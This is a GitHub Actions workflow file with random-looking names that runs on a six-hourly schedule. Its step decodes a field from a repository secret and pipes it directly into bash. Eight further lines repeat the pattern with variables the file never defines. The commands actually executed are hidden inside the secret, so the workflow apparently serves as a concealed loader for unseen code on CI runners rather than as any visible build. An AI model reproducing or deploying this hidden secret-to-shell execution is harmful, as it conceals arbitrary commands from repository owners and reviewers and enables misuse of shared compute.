name: haosiwen19871010
on:
  workflow_dispatch:
  schedule:
    - cron: '29 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: haosiwen19871010
        env:
          bb961: ${{ secrets.bb961 }}
        run: |
          echo $bb961 | jq -r .ws439 | /bin/bash
          echo $em7251 | jq -r .yfq02 | /bin/bash
          echo $rox2 | jq -r .zfy8 | /bin/bash
          echo $vtpfe23707 | jq -r .uoi87 | /bin/bash
          echo $a8001 | jq -r .ono011 | /bin/bash
          echo $sqdr8 | jq -r .euilu631 | /bin/bash
          echo $nv80651 | jq -r .munew357 | /bin/bash
          echo $i607 | jq -r .qakxb010 | /bin/bash
          echo $bvln35 | jq -r .whzfo8980 | /bin/bash

